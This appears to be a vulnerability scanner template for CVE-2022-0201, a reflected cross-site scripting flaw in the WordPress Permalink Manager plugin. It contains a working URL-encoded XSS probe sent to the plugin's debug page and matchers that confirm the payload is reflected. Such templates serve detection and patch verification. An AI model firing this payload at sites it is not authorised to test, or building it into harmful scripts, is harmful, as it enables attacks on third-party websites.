42 lines
1.2 KiB
YAML
42 lines
1.2 KiB
YAML
id: CVE-2022-0201
|
|
|
|
info:
|
|
name: WordPress Permalink Manager <2.2.15 - Cross-Site Scripting
|
|
author: Akincibor
|
|
severity: medium
|
|
description: |
|
|
WordPress Permalink Manager Lite and Pro plugins before 2.2.15 contain a reflected cross-site scripting vulnerability. They do not sanitize and escape query parameters before outputting them back in the debug page.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/f274b0d8-74bf-43de-9051-29ce36d78ad4
|
|
- https://plugins.trac.wordpress.org/changeset/2656512
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-0201
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00112
|
|
tags: wp-plugin,wpscan,cve,cve2022,xss,wordpress
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '<img src onerror=alert(/XSS/)>'
|
|
- 'pm_query'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
# Enhanced by md on 2022/09/08
|